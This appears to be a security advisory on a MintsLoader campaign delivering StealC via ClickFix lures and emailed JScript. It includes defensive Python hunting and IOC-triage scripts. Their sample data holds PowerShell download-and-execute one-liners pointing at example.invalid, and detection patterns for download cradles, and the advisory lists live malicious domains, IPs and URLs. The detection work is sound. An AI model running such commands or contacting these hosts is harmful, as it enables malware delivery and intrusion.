January 27, 2025
Severity
High
Analysis Summary
Threat hunters have uncovered an ongoing campaign that uses MintsLoader, a PowerShell-based malware loader, to distribute secondary payloads such as the StealC information stealer and the legitimate open-source volunteer computing platform BOINC. According to analysis published by a cybersecurity firm, MintsLoader is delivered through spam emails whose links lead either to KongTuke/ClickFix pages or to an obfuscated JScript file.
The campaign, detected in January 2025, targets the electricity, oil and gas, and legal services sectors in the U.S. and Europe. Attackers plant fake CAPTCHA verification prompts on compromised websites to trick visitors into running a malicious PowerShell command themselves. These prompts, tracked as ClickFix or KongTuke, use page script to copy the command into the visitor's clipboard and then instruct the visitor to open the Windows Run dialog (Win+R), paste, and press Enter. No browser exploit is involved, which is why the resulting process lineage (explorer.exe launching powershell.exe) is the useful detection point.
The e-mail path begins with a link that downloads an obfuscated JScript file; when opened with the Windows Script Host, it runs PowerShell commands that install MintsLoader. MintsLoader contacts a command-and-control (C2) server to download interim payloads, performs sandbox-evasion checks, and uses a domain generation algorithm (DGA) to derive its C2 domains (compare the random-looking .top domains in the indicator list below), before ultimately deploying StealC, an information stealer re-engineered from the Arkei stealer and sold as malware-as-a-service (MaaS). StealC avoids infecting systems in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.
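As an added example (not code from the original advisory or from the researchers it cites), the following Python hunting logic checks process-creation records for both delivery paths described above: a PowerShell command pasted into the Run dialog, which leaves explorer.exe as the parent process, and the emailed JScript file, which appears as wscript.exe or cscript.exe spawning PowerShell. Encoded (-enc) arguments are decoded first so the string rules can see what they contain. Field names follow Sysmon Event ID 1 conventions; the sample events, file paths and the example.invalid URLs are constructed for illustration and are not telemetry from the campaign.

```python
import base64
import re

# Added example: hunting logic for the two MintsLoader delivery paths, run over
# constructed process-creation records (Sysmon Event ID 1 field names).
# The sample events are invented for illustration, not telemetry from the campaign.

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Switches and cmdlets typical of ClickFix one-liners and loader stagers.
SUSPICIOUS_PS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|\biex\b|invoke-expression|"
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|frombase64string|mshta)",
    re.IGNORECASE,
)
# Script files executed from locations a phishing download would land in.
USER_WRITABLE_SCRIPT = re.compile(
    r'\\(?:downloads|desktop|temp|appdata)\\[^"]*\.(?:js|jse|vbs|vbe|wsf)\b', re.IGNORECASE
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _encode_ps(command: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -enc payload to the command line so string rules see it.

    Returns the command line unchanged when no valid encoded argument is present.
    """
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return cmdline
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def classify(event: dict) -> list:
    """Return the reasons an event looks like ClickFix or JScript-to-PowerShell staging."""
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmdline = event["CommandLine"]
    findings = []
    if image in POWERSHELL:
        effective = decode_encoded_command(cmdline)
        # Win+R launches go through explorer.exe, which is how a pasted ClickFix command runs.
        if parent == "explorer.exe" and SUSPICIOUS_PS.search(effective):
            findings.append("PowerShell launched from explorer.exe (Run dialog) with download-and-execute switches")
        # The emailed JScript path: wscript.exe/cscript.exe spawning PowerShell.
        if parent in SCRIPT_HOSTS:
            findings.append("PowerShell spawned by a Windows Script Host process")
        if effective != cmdline and SUSPICIOUS_PS.search(effective):
            findings.append("encoded command decodes to download-and-execute logic")
    elif image in SCRIPT_HOSTS and parent == "explorer.exe" and USER_WRITABLE_SCRIPT.search(cmdline):
        findings.append("script host opened a script file from a user-writable directory")
    return findings


def hunt(events: list) -> list:
    """Return (event index, finding) pairs for every suspicious event."""
    return [(i, f) for i, e in enumerate(events) for f in classify(e)]


SAMPLE_EVENTS = [  # constructed records, in the order a ClickFix and a JScript infection would log them
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/1.php?s=1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice_4471.js"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -enc "
                    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",  # benign: editor terminal
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-ChildItem"},
]

if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The explorer.exe parent check is the part worth keeping: it is hard for the attacker to change, because the Run dialog is exactly what the ClickFix page tells the victim to use, whereas the switch list will need updating as lures change.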
Simultaneously, the Astolfo Loader (JinxLoader V3), a rewritten version of JinxLoader in C++, highlights the affordability and proliferation of malicious tools on hacking forums. Researchers also identified GootLoader campaigns using search engine optimization (SEO) poisoning to redirect users to compromised WordPress sites hosting fake forums. These sites dynamically load malware via a "mothership" server, employing obfuscation, geofencing, and IP blocking to evade detection, making remediation challenging even for site owners.
Together, these campaigns underline the evolving sophistication of malware operations and the continued use of deceptive social engineering techniques to target victims across industries.
Impact
- Sensitive Data Theft
- Financial Loss
Indicators of Compromise
Domain Name
- rosettahome.top
- xaides.com
- usbkits.com
- hkinuxb3bz.top
- mubuzb3vvv.top
- nfuvueibzi4.top
- mnudybh4unh.top
- nuvye89bjz4.top
- mbuz73hb7z3.top
- tubnzy3uvz.top
- nubxz4ubhxz9i.top
- poeiughybzu222.top
- poubnxu3jubz.top
- lgbibzuehbz.top
- ohunhebzhbu3.top
- sdubvlbbuz3vzzz.top
- bnbuzu49ibz4.top
- shd9inbjz4.top
- ngub8zb38ib.top
- gkn33hxueub.top
- mnvuz3gvy3.top
- jhubzgv3.top
- adkfnnbmakcgael.top
- hhgiflifcbmdjmh.top
- blclmjamegjaffd.top
- iblaehgffmflamn.top
- bfhdkgmmhdbikgj.top
- jjdgdeffjimfgne.top
- canjjclmlnicbga.top
- jejmbadfmeenlnk.top
- diebinjmajbkhhg.top
- kmaealcfcalhcac.top
- dckhgjimeghemhl.top
- lggknhaffleahbh.top
- ekbnfghmhcaldid.top
- lalclenfjhkinbn.top
- feheecfmkmhfiij.top
- midhkalfmddcece.top
- fnnkcnemajnnaja.top
- mdinjlkfcajkjck.top
- ghecbjcmdfghfkg.top
- nlafhhiffkceadc.top
- gbkiafbmhbmbkkl.top
- afglgehgjgjmgdh.top
- hjbamcnnkmfjbld.top
- anldfaggmdbglen.top
- idhglmmnaimdhlj.top
- bidjdlegcnincee.top
- immmjjkndeekmma.top
- ccibchdgfjbhhfk.top
- jgeeifjnhbledmg.top
- ckahaebgighbngc.top
- afnfdijahijefmh.top
- kcehmenjdibnmni.top
- kdemjgebjimkanl.top
- gajaechkfhfghal.top
- cmacnnkfbhlcncm.top
IP
- 145.223.100.233
- 67.217.228.118
- 45.61.136.138
MD5
- 46859e09844b9a698f15023607afa509
- 902c133812718bacf8e86a6d8bbeb22d
- 760f00e30887017cdea9809fd1c38e52
SHA-256
- b8804a7ef09a9c1e8ede3a86a087b754b42f5b37c6de1e82c86f38d01c297ee2
- 138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa
- 91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3
SHA-1
- cdcc6faff70801edb2324d8472619d0b338f8080
- 23ae2fdaf0c85b08e13ef68d925997c08a19a1f9
- b09271e96ff73b86bd54489fbae1c224369a8bc8
URL
- https://t1jm05fdu6748emu5oon8nix1uk2ogyn.lovesnextmeeting.com/Uswl5JAnXI
- http://mubuzb3vvv.top/1.php?s=527
- http://62.204.41.177/edd20096ecef326d.php
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment using your respective security controls: DNS and proxy logs for the domains, IPs and URLs above, and endpoint telemetry for the hashes. For the ClickFix path, also review PowerShell script block logs (Event ID 4104) and the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records commands entered into the Run dialog.
- Do not open attachments or follow links in emails from unknown sources, never paste a command from a web page into the Run dialog or a terminal regardless of how the page phrases the request, and strictly refrain from enabling macros when the source isn't trusted.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.
- Block or restrict execution of HTA files and Windows Script Host scripts (.js, .jse, .vbs, .wsf) for standard users, for example by associating those extensions with a text editor, and restrict macros in email attachments and downloaded files.
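The remediation list says to search for the indicators; as an added example (not part of the original advisory), the Python below runs a subset of the domains and IP addresses listed on this page against constructed DNS log lines, matches domains by suffix so that subdomains of a listed domain are also caught, and adds a simple heuristic for random-looking names that are not on the list, since a loader that derives its C2 domains with a DGA will rotate through names no static list contains. The log format, the non-listed domains and the 203.0.113.x answers are assumptions; the scoring thresholds are illustrative, and the run on the sample log shows the heuristic missing rosettahome.top, which only the exact match catches.

```python
import re

# Added example: IOC matching and a DGA-likeness heuristic over DNS logs.
# Domains and IPs below are copied from the indicator list on this page;
# the log lines, the non-listed domains and the 203.0.113.x answers are constructed.

IOC_DOMAINS = {
    "rosettahome.top", "xaides.com", "usbkits.com", "hkinuxb3bz.top",
    "mubuzb3vvv.top", "adkfnnbmakcgael.top", "hhgiflifcbmdjmh.top",
}
IOC_IPS = {"145.223.100.233", "67.217.228.118", "45.61.136.138", "62.204.41.177"}
# Assumption: TLDs that are common in throwaway registrations.
CHEAP_TLDS = {"top", "xyz", "shop", "icu", "click"}

SAMPLE_DNS_LOG = """\
2025-01-27T10:14:02Z client=10.0.5.23 query=www.microsoft.com type=A answer=203.0.113.10
2025-01-27T10:14:09Z client=10.0.5.23 query=hkinuxb3bz.top type=A answer=145.223.100.233
2025-01-27T10:14:11Z client=10.0.5.23 query=qwubzx83bhz.top type=A answer=203.0.113.44
2025-01-27T10:15:30Z client=10.0.7.8 query=cdn.example.org type=A answer=62.204.41.177
2025-01-27T10:16:01Z client=10.0.5.23 query=adkfnnbmakcgael.top type=A answer=NXDOMAIN
2025-01-27T10:16:44Z client=10.0.9.2 query=mail.google.com type=A answer=203.0.113.77
2025-01-27T10:17:05Z client=10.0.5.23 query=rosettahome.top type=A answer=45.61.136.138
2025-01-27T10:17:20Z client=10.0.5.23 query=update.mubuzb3vvv.top type=A answer=67.217.228.118
"""

LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+client=(?P<client>\S+)\s+query=(?P<query>\S+)\s+type=(?P<type>\S+)\s+answer=(?P<answer>\S+)$"
)


def matches_ioc_domain(query: str) -> bool:
    """Exact match or subdomain of a listed domain."""
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in IOC_DOMAINS)


def dga_score(domain: str) -> int:
    """Count crude signs of an algorithmically generated name (0-4)."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2 or not labels[-2]:
        return 0
    label, tld = labels[-2], labels[-1]
    score = 0
    if len(label) >= 10:                      # long registrable label
        score += 1
    vowels = sum(c in "aeiou" for c in label)
    if vowels / len(label) < 0.3:             # unpronounceable consonant runs
        score += 1
    if any(c.isdigit() for c in label) and any(c.isalpha() for c in label):
        score += 1                            # letters and digits mixed
    if tld in CHEAP_TLDS:
        score += 1
    return score


def triage(log_text: str, dga_threshold: int = 3) -> list:
    """Return one record per log line that matched an IOC or the heuristic."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = []
        if matches_ioc_domain(m["query"]):
            reasons.append("domain on IOC list")
        if m["answer"] in IOC_IPS:
            reasons.append("resolved to IOC IP")
        score = dga_score(m["query"])
        if score >= dga_threshold:
            reasons.append(f"DGA-like name (score {score})")
        if reasons:
            hits.append({"ts": m["ts"], "client": m["client"], "query": m["query"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_DNS_LOG):
        print(hit["ts"], hit["client"], hit["query"], "; ".join(hit["reasons"]))
```

Treat the heuristic as a triage aid, not a block list: it is meant to surface sibling domains for analyst review, and a threshold of 3 already flags every listed .top domain except rosettahome.top on this page's sample.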